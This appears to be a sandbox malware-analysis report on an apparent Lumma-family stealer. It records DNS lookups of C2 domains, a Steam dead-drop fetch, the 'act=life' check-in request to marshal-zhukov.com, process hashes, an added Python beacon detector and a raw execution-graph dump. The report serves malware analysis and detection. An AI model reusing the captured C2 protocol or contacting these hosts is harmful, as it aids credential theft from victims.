Nov 21, 2024 13:45:23.535934925 CET | 1.1.1.1 | 192.168.2.9 | 0x202b | Name error (3) | vennurviot.sbs | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:23.783781052 CET | 1.1.1.1 | 192.168.2.9 | 0xf2d2 | Name error (3) | ehticsprocw.sbs | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:24.032608032 CET | 1.1.1.1 | 192.168.2.9 | 0x824a | Name error (3) | condifendteu.sbs | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:24.278294086 CET | 1.1.1.1 | 192.168.2.9 | 0xbafc | Name error (3) | drawwyobstacw.sbs | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:24.508641005 CET | 1.1.1.1 | 192.168.2.9 | 0xd211 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:27.349638939 CET | 1.1.1.1 | 192.168.2.9 | 0x99e4 | No error (0) | marshal-zhukov.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:27.349638939 CET | 1.1.1.1 | 192.168.2.9 | 0x99e4 | No error (0) | marshal-zhukov.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• marshal-zhukov.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49765 | 104.102.49.254 | 443 | 2976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 12:45:26 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-11-21 12:45:26 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Thu, 21 Nov 2024 12:45:26 GMT
Content-Length: 35604
Connection: close
Set-Cookie: sessionid=38400b1f7eb6985721b07fb4; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C820d04e8bfee2ac1774d9f20f79a4923; Path=/; Secure; HttpOnly; SameSite=None
2024-11-21 12:45:26 UTC | 14479 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-11-21 12:45:27 UTC | 16384 | IN | Data Raw: 0d 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 22 3e 0d 0a 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0d 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73
Data Ascii: Workshop</a><a class="submenuitem" href="https://steamcommunity.com/market/">Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broadcasts
2024-11-21 12:45:27 UTC | 3768 | IN | Data Raw: 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 37 32 34 33 33 31 39 30 30 2f 62 61 64 67 65 73 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 22 3e 4c 65
Data Ascii: <a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199724331900/badges"><div class="persona_name persona_level">Le
                                                                                                                    2024-11-21 12:45:27 UTC973INData Raw: 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0d 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 0d
                                                                                                                    Data Ascii: unity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Privacy Policy</a>


Session ID: 1
Source IP: 192.168.2.9    Source Port: 49776
Destination IP: 188.114.97.3    Destination Port: 443
PID: 2976    Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

Timestamp                Bytes  Direction  Data
2024-11-21 12:45:28 UTC  265    OUT        POST /api HTTP/1.1
                                           Connection: Keep-Alive
                                           Content-Type: application/x-www-form-urlencoded
                                           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                           Content-Length: 8
                                           Host: marshal-zhukov.com
2024-11-21 12:45:28 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                                           Data Ascii: act=life
2024-11-21 12:45:29 UTC  996    IN         HTTP/1.1 200 OK
                                           Date: Thu, 21 Nov 2024 12:45:29 GMT
                                           Content-Type: text/html; charset=UTF-8
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           Set-Cookie: PHPSESSID=4tog8l1sa2o4p5umdlb4j6jduo; expires=Mon, 17-Mar-2025 06:32:08 GMT; Max-Age=9999999; path=/
                                           Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                           Cache-Control: no-store, no-cache, must-revalidate
                                           Pragma: no-cache
                                           CF-Cache-Status: DYNAMIC
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5FNXsAT213ebUZ6c%2Bkonky1fjRZwSz7%2FwnN30erQV8I4O1%2BRWZSiPBgLXhemZr%2BehZGXrRTgA%2Fhf2yYAW0d2cjaABZgMdcgtX7CVRD0tLQiKe4N4zTDdwwFmIbjFgAgWRzy%2BISc%3D"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8e60c6ef9fd4440d-EWR
                                           alt-svc: h3=":443"; ma=86400
                                           server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1855146&cwnd=191&unsent_bytes=0&cid=b00b79f4cf7c4bd4&ts=725&x=0"
2024-11-21 12:45:29 UTC  7      IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
                                           Data Ascii: 2\r\nok\r\n  (one 2-byte chunk carrying "ok")
2024-11-21 12:45:29 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0\r\n\r\n  (terminating chunk)
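The exchange above is the injected ngentask.exe checking in to the C2: an 8-byte form body act=life posted to /api and answered with a chunked "ok". As an added example that is not part of the Joe Sandbox report, the following Python reconstructs the request and response from the Data Raw / Data Ascii records, decodes the chunked body, and lists the traits that separate this check-in from real browser traffic (a Chrome User-Agent with none of the Accept headers Chrome always sends, a fixed POST /api with the act=life body, a bare "ok" reply). The REQUEST bytes are an assumption only in layout; their length matches the 265-byte header record plus the 8-byte body. The RESPONSE drops the long Cloudflare telemetry headers (Report-To, NEL, CF-RAY, alt-svc, server-timing), which the checks do not use.

```python
# Added example, not part of the Joe Sandbox report: parse the captured
# ngentask.exe -> marshal-zhukov.com exchange and list the traits that make it
# look like the LummaC "act=life" check-in rather than browser traffic.
# REQUEST/RESPONSE are reconstructed from the report's hex/ASCII records; the
# response omits the long Cloudflare telemetry headers, which the checks ignore.

REQUEST = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 8\r\n"
    b"Host: marshal-zhukov.com\r\n"
    b"\r\n"
    b"act=life"  # Data Raw: 61 63 74 3d 6c 69 66 65
)

RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Thu, 21 Nov 2024 12:45:29 GMT\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: close\r\n"
    b"Set-Cookie: PHPSESSID=4tog8l1sa2o4p5umdlb4j6jduo; expires=Mon, 17-Mar-2025 06:32:08 GMT; Max-Age=9999999; path=/\r\n"
    b"Cache-Control: no-store, no-cache, must-revalidate\r\n"
    b"Server: cloudflare\r\n"
    b"\r\n"
    b"2\r\nok\r\n"  # Data Raw: 32 0d 0a 6f 6b 0d 0a  (one 2-byte chunk)
    b"0\r\n\r\n"    # Data Raw: 30 0d 0a 0d 0a        (terminating chunk)
)

# Headers Chrome sends on every request; their absence under a Chrome
# User-Agent is a cheap, reliable tell for a non-browser HTTP stack.
BROWSER_HEADERS = ("accept", "accept-encoding", "accept-language")


def parse_http_message(raw: bytes) -> tuple[str, dict[str, str], bytes]:
    """Split an HTTP/1.1 message into start line, headers (names lower-cased) and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_chunked(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body: hex size line, data, CRLF, ..., "0" chunk."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        if size == 0:
            return bytes(out)
        data_start = eol + 2
        out += body[data_start:data_start + size]
        pos = data_start + size + 2  # step over the chunk data and its trailing CRLF


def beacon_indicators(request: bytes, response: bytes) -> list[str]:
    """Return the traits of an exchange that match the check-in seen in this report."""
    req_line, req_hdr, req_body = parse_http_message(request)
    status_line, resp_hdr, resp_body = parse_http_message(response)
    hits: list[str] = []

    method, path, _ = req_line.split(" ", 2)
    if method == "POST" and path == "/api":
        hits.append("POST to /api")
    if (req_hdr.get("content-type") == "application/x-www-form-urlencoded"
            and req_body == b"act=life"):
        hits.append("form body 'act=life' (LummaC check-in)")
    if ("chrome/" in req_hdr.get("user-agent", "").lower()
            and not any(h in req_hdr for h in BROWSER_HEADERS)):
        hits.append("Chrome User-Agent without Accept/Accept-Encoding/Accept-Language")

    body = resp_body
    if resp_hdr.get("transfer-encoding", "").lower() == "chunked":
        body = decode_chunked(resp_body)
    if status_line.startswith("HTTP/1.1 200") and body == b"ok":
        hits.append("200 OK with bare 'ok' body")
    return hits


if __name__ == "__main__":
    for hit in beacon_indicators(REQUEST, RESPONSE):
        print("indicator:", hit)
```

The missing-Accept-header check is the most portable of the four: the path, body and reply can change between Lumma builds, but a stealer that spoofs a Chrome User-Agent from its own WinHTTP/raw-socket client rarely bothers to imitate the rest of Chrome's header set.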


                                                                                                                    Target ID:0
                                                                                                                    Start time:07:45:17
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\ceFgl3jkkk.exe"
                                                                                                                    Imagebase:0xf50000
                                                                                                                    File size:7'166'290 bytes
                                                                                                                    MD5 hash:9CF2FCABD10EE683A3652815014B368C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:07:45:18
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\ceFgl3jkkk.exe"
                                                                                                                    Imagebase:0xf50000
                                                                                                                    File size:7'166'290 bytes
                                                                                                                    MD5 hash:9CF2FCABD10EE683A3652815014B368C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:07:45:20
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
                                                                                                                    Imagebase:0xc40000
                                                                                                                    File size:79'816 bytes
                                                                                                                    MD5 hash:AE933850C93D3B3001AB21BB65C3EFA1
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:9.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:8.8%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:127
execution_graph: the rendered graph does not survive text extraction; what follows is what can be recovered from the node/edge dump. The nodes are code addresses in the 0xf5xxxx-0xf7xxxx range, consistent with the Imagebase 0xf50000 of ceFgl3jkkk.exe, and the node labels are almost entirely MSVC CRT and startup routines (_free, __dosmaperr, _mbstowcs, __fread_nolock, __wsopen_s, _wcschr, ___from_strstr_to_strchr, ___scrt_is_nonwritable_in_current_image, _ValidateLocalCookies, ___vcrt_freefls@4, ___vcrt_FlsGetValue). Win32 APIs reached on those paths: RtlAllocateHeap, HeapSize, HeapReAlloc, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, EnterCriticalSection, LeaveCriticalSection, GetLastError, SetLastError, GetCPInfo, MultiByteToWideChar, CreateFileW, CloseHandle, GetFileType, PeekNamedPipe, GetFileInformationByHandle, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetCurrentDirectoryW, GetFullPathNameW, GetDriveTypeW, FindFirstFileExW. None of the stealer's own logic appears here, which matches the 0% dynamic/decrypted code coverage reported above: the graph covers the PyInstaller loader's runtime, not the payload that is unpacked and injected into ngentask.exe.
f604fe 18377->18379 18378->18371 18380 f63b43 __wsopen_s 11 API calls 18379->18380 18381 f60508 18380->18381 18382 f60529 18381->18382 18385 f60552 FindNextFileW 18381->18385 18383 f5e619 _free 14 API calls 18382->18383 18384 f6052e 18383->18384 18386 f63b33 __fread_nolock 25 API calls 18384->18386 18387 f60564 GetLastError 18385->18387 18388 f605a3 18385->18388 18389 f60539 18386->18389 18391 f60580 18387->18391 18392 f60571 18387->18392 18390 f60624 7 API calls 18388->18390 18396 f596fa _ValidateLocalCookies 5 API calls 18389->18396 18393 f605c4 18390->18393 18395 f5e619 _free 14 API calls 18391->18395 18394 f6059a 18392->18394 18399 f6058d 18392->18399 18400 f6057b 18392->18400 18398 f60624 7 API calls 18393->18398 18397 f5e619 _free 14 API calls 18394->18397 18395->18389 18402 f60547 18396->18402 18397->18389 18403 f605d6 18398->18403 18401 f5e619 _free 14 API calls 18399->18401 18400->18391 18400->18394 18401->18389 18404 f60624 7 API calls 18403->18404 18405 f605e8 18404->18405 18412 f60644 FileTimeToSystemTime 18411->18412 18413 f6063e 18411->18413 18414 f60653 SystemTimeToTzSpecificLocalTime 18412->18414 18415 f60667 18412->18415 18413->18412 18413->18415 18414->18415 18416 f596fa _ValidateLocalCookies 5 API calls 18415->18416 18417 f604a8 18416->18417 18417->18369 22395 f64d62 22396 f64d6e ___scrt_is_nonwritable_in_current_image 22395->22396 22407 f68793 EnterCriticalSection 22396->22407 22398 f64d75 22408 f6078e 22398->22408 22401 f64d93 22430 f64db9 22401->22430 22407->22398 22409 f6079a ___scrt_is_nonwritable_in_current_image 22408->22409 22410 f607c4 22409->22410 22411 f607a3 22409->22411 22433 f68793 EnterCriticalSection 22410->22433 22413 f5e619 _free 14 API calls 22411->22413 22414 f607a8 22413->22414 22415 f63b33 __fread_nolock 25 API calls 22414->22415 22416 f607b2 22415->22416 22416->22401 22419 f64bf8 GetStartupInfoW 22416->22419 22417 f607d0 22434 f60823 22417->22434 22420 f64c15 22419->22420 22421 f64ca9 22419->22421 22420->22421 22422 f6078e 
25 API calls 22420->22422 22425 f64cae 22421->22425 22423 f64c3d 22422->22423 22423->22421 22424 f64c6d GetFileType 22423->22424 22424->22423 22427 f64cb5 22425->22427 22426 f64cf8 GetStdHandle 22426->22427 22427->22426 22428 f64d5e 22427->22428 22429 f64d0b GetFileType 22427->22429 22428->22401 22429->22427 22438 f687db LeaveCriticalSection 22430->22438 22432 f64da4 22433->22417 22437 f687db LeaveCriticalSection 22434->22437 22436 f6082a 22436->22416 22437->22436 22438->22432 21732 f5e4e0 21733 f5fbaa ___scrt_uninitialize_crt 66 API calls 21732->21733 21734 f5e4e8 21733->21734 21742 f67528 21734->21742 21736 f5e4ed 21737 f63ecc 14 API calls 21736->21737 21738 f5e4fc DeleteCriticalSection 21737->21738 21738->21736 21739 f5e517 21738->21739 21740 f63b77 _free 14 API calls 21739->21740 21741 f5e522 21740->21741 21743 f67534 ___scrt_is_nonwritable_in_current_image 21742->21743 21752 f68793 EnterCriticalSection 21743->21752 21745 f675ab 21753 f675ca 21745->21753 21746 f6753f 21746->21745 21748 f6757f DeleteCriticalSection 21746->21748 21750 f5b65c 67 API calls 21746->21750 21751 f63b77 _free 14 API calls 21748->21751 21750->21746 21751->21746 21752->21746 21756 f687db LeaveCriticalSection 21753->21756 21755 f675b7 21755->21736 21756->21755 17877 f61558 17878 f61564 ___scrt_is_nonwritable_in_current_image 17877->17878 17879 f61581 17878->17879 17880 f6156a 17878->17880 17890 f5e52c EnterCriticalSection 17879->17890 17881 f5e619 _free 14 API calls 17880->17881 17883 f6156f 17881->17883 17885 f63b33 __fread_nolock 25 API calls 17883->17885 17884 f61591 17891 f615d8 17884->17891 17889 f6157a 17885->17889 17887 f6159d 17912 f615ce 17887->17912 17890->17884 17892 f615e6 17891->17892 17893 f615fd 17891->17893 17894 f5e619 _free 14 API calls 17892->17894 17895 f62f81 __fread_nolock 25 API calls 17893->17895 17896 f615eb 17894->17896 17897 f61607 17895->17897 17898 f63b33 __fread_nolock 25 API calls 17896->17898 17900 f64bc2 29 API calls 17897->17900 17899 f615f6 17898->17899 
17899->17887 17901 f61622 17900->17901 17902 f61695 17901->17902 17903 f616ea 17901->17903 17908 f6164c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17901->17908 17905 f616af 17902->17905 17907 f616c3 17902->17907 17904 f616f8 17903->17904 17903->17907 17906 f5e619 _free 14 API calls 17904->17906 17915 f61915 17905->17915 17906->17908 17907->17908 17927 f6175c 17907->17927 17908->17887 17934 f5e540 LeaveCriticalSection 17912->17934 17914 f615d6 17914->17889 17916 f61924 __wsopen_s 17915->17916 17917 f62f81 __fread_nolock 25 API calls 17916->17917 17919 f61937 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17917->17919 17918 f596fa _ValidateLocalCookies 5 API calls 17920 f616bb 17918->17920 17921 f64bc2 29 API calls 17919->17921 17926 f61943 17919->17926 17920->17908 17922 f61991 17921->17922 17923 f619c3 ReadFile 17922->17923 17922->17926 17924 f619ea 17923->17924 17923->17926 17925 f64bc2 29 API calls 17924->17925 17925->17926 17926->17918 17928 f62f81 __fread_nolock 25 API calls 17927->17928 17929 f6176f 17928->17929 17930 f64bc2 29 API calls 17929->17930 17933 f617b7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17929->17933 17931 f61807 17930->17931 17932 f64bc2 29 API calls 17931->17932 17931->17933 17932->17933 17933->17908 17934->17914 22471 f69342 22472 f6934e ___scrt_is_nonwritable_in_current_image 22471->22472 22479 f68793 EnterCriticalSection 22472->22479 22474 f69359 22480 f693a1 22474->22480 22479->22474 22481 f693c7 22480->22481 22482 f693b1 22480->22482 22485 f69422 22481->22485 22486 f693dd 22481->22486 22483 f5e619 _free 14 API calls 22482->22483 22484 f693b6 22483->22484 22487 f63b33 __fread_nolock 25 API calls 22484->22487 22488 f5e619 _free 14 API calls 22485->22488 22490 f692be 38 API calls 22486->22490 22492 f6936f 22487->22492 22489 f69427 22488->22489 22491 f63b33 __fread_nolock 25 API calls 22489->22491 22493 f693ee 22490->22493 22491->22492 22498 f69398 22492->22498 22493->22492 22494 f68911 25 API calls 22493->22494 22495 f6943d 22494->22495 
22495->22492 22496 f63b43 __wsopen_s 11 API calls 22495->22496 22497 f69457 22496->22497 22501 f687db LeaveCriticalSection 22498->22501 22500 f69383 22501->22500 18418 f51740 18419 f51769 18418->18419 18420 f5175b 18418->18420 18424 f517cb 18419->18424 18464 f562c0 18419->18464 18490 f535c0 18420->18490 18426 f596fa _ValidateLocalCookies 5 API calls 18424->18426 18428 f517df 18426->18428 18429 f517e3 18476 f5b91e 18429->18476 18430 f517bc 18500 f521e0 18430->18500 18434 f5bd15 64 API calls 18435 f51877 18434->18435 18440 f518b0 18435->18440 18441 f51889 18435->18441 18436 f521e0 53 API calls 18437 f51809 18436->18437 18438 f596fa _ValidateLocalCookies 5 API calls 18437->18438 18439 f5181d 18438->18439 18443 f5b91e __fread_nolock 39 API calls 18440->18443 18442 f521e0 53 API calls 18441->18442 18444 f51898 18442->18444 18445 f518bd 18443->18445 18446 f596fa _ValidateLocalCookies 5 API calls 18444->18446 18447 f517fa 18445->18447 18448 f518cf 18445->18448 18447->18436 18465 f562da 18464->18465 18466 f5642a 18465->18466 18467 f5bd15 64 API calls 18465->18467 18468 f5e365 ___vcrt_freefls@4 14 API calls 18466->18468 18472 f562fb 18467->18472 18469 f5179d 18468->18469 18469->18424 18473 f5bd15 18469->18473 18470 f5bd15 64 API calls 18470->18472 18471 f5b91e __fread_nolock 39 API calls 18471->18472 18472->18466 18472->18470 18472->18471 18522 f5bad3 18473->18522 18561 f5b93b 18476->18561 18491 f535ca __wsopen_s 18490->18491 18661 f56990 18491->18661 18493 f535f7 18494 f56990 53 API calls 18493->18494 18495 f53604 18494->18495 18676 f5f492 18495->18676 18498 f596fa _ValidateLocalCookies 5 API calls 18499 f53625 18498->18499 18499->18419 18501 f5221c 18500->18501 18502 f5e312 44 API calls 18501->18502 18503 f5222a 18502->18503 18504 f5e619 _free 14 API calls 18503->18504 18505 f5222f 18504->18505 19086 f5e6a1 18505->19086 18508 f51a90 44 API calls 18524 f5badf ___scrt_is_nonwritable_in_current_image 18522->18524 18523 f5bae5 18526 f5e619 _free 14 API calls 18523->18526 
18524->18523 18525 f5bb0b 18524->18525 18535 f5e52c EnterCriticalSection 18525->18535 18528 f5baea 18526->18528 18530 f63b33 __fread_nolock 25 API calls 18528->18530 18529 f5bb17 18536 f5bc37 18529->18536 18532 f517b5 18530->18532 18532->18429 18532->18430 18533 f5bb2b 18547 f5bb54 18533->18547 18535->18529 18537 f5bc5a 18536->18537 18538 f5bc4a 18536->18538 18550 f5bb5e 18537->18550 18540 f5e619 _free 14 API calls 18538->18540 18541 f5bc4f 18540->18541 18541->18533 18542 f5bd00 18542->18533 18543 f5bc7d 18543->18542 18554 f5fafd 18543->18554 18545 f64bdd __wsopen_s 27 API calls 18545->18542 18560 f5e540 LeaveCriticalSection 18547->18560 18549 f5bb5c 18549->18532 18551 f5bb6f 18550->18551 18552 f5bbc7 18550->18552 18551->18552 18553 f64bdd __wsopen_s 27 API calls 18551->18553 18552->18543 18553->18552 18555 f5fb15 18554->18555 18556 f5bca4 18554->18556 18555->18556 18557 f62f81 __fread_nolock 25 API calls 18555->18557 18556->18545 18558 f5fb33 18557->18558 18559 f65569 __wsopen_s 62 API calls 18558->18559 18559->18556 18560->18549 18563 f5b947 ___scrt_is_nonwritable_in_current_image 18561->18563 18562 f517f2 18562->18434 18562->18447 18563->18562 18564 f5b991 18563->18564 18565 f5b95a __fread_nolock 18563->18565 18574 f5e52c EnterCriticalSection 18564->18574 18567 f5e619 _free 14 API calls 18565->18567 18569 f5b974 18567->18569 18568 f5b99b 18575 f5b738 18568->18575 18571 f63b33 __fread_nolock 25 API calls 18569->18571 18571->18562 18574->18568 18579 f5b749 __fread_nolock 18575->18579 18587 f5b765 18575->18587 18576 f5b755 18577 f5e619 _free 14 API calls 18576->18577 18579->18576 18581 f5b7a7 __fread_nolock 18579->18581 18579->18587 18582 f5b8ce __fread_nolock 18581->18582 18583 f62f81 __fread_nolock 25 API calls 18581->18583 18584 f5b9d8 __fread_nolock 25 API calls 18581->18584 18586 f644f5 __fread_nolock 37 API calls 18581->18586 18581->18587 18583->18581 18584->18581 18586->18581 18588 f5b9d0 18587->18588 18662 f569f6 18661->18662 18663 f5699a 
